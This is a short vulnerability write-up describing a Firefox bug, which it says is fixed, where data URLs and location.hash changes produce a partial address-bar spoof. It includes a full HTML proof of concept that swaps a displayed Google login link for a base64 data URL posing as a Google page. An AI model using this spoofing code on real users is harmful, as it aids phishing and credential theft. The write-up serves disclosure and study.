In FireFox, there is an interesting behavior that I noticed when using Data URL and hash symbol. The most interesting behavior of the hash symbol is that if it changes (AKA location.hash changes)
it will not reload the page and this applies to data URLS as well.
Let's look at how Firefox used to handle data URLS with hash symbol changes:
First, I noticed that navigating to 'data:#text/html,<b>Hello</b>' (note the invalid content type) still rendered as html (now fixed), and if we change location.hash to equal '//mozilla.org'
the address URL changes to 'data:#//mozilla.org' without the document changing, successfully achieving a partial URL spoof.
<!DOCTYPE html> <html> <head> <title>Firefox social engineering, partial url spoof PoC</title> </head> <body> Click-> <a id="qab" target="_blank" rel="prefetch nofollow noreferrer" href="https://secure.google.com/login">https://secure.google.com/login</a> <- <script> qab.addEventListener("click",$=>{ qab.href='data:#;text/html;base64,PGh0bWw+PGhlYWQgcHJvZmlsZT0iaHR0cDovL3d3dy53My5vcmcvMjAwNS8xMC9wcm9maWxlIj48bGluayByZWw9Imljb24iIHR5cGU9ImltYWdlL3BuZyIgaHJlZj0iaHR0cDovL3d3dy5nb29nbGUuY29tL2Zhdmljb24uaWNvIj48dGl0bGU+R29vZ2xlPC90aXRsZT48L2hlYWQ+PGJvZHk+PGI+c2VlbXMgbGVnaXQ8L2I+PHNjcmlwdD5sb2NhdGlvbi5oYXNoPScvL3NlY3VyZS5nb29nbGUuY29tL2xvZ2luJzs8L3NjcmlwdD48L2JvZHk+PC9odG1sPg=='; //Base64 is used to ensure the hashtag in the content is not parsed. }); </script> </body> </html>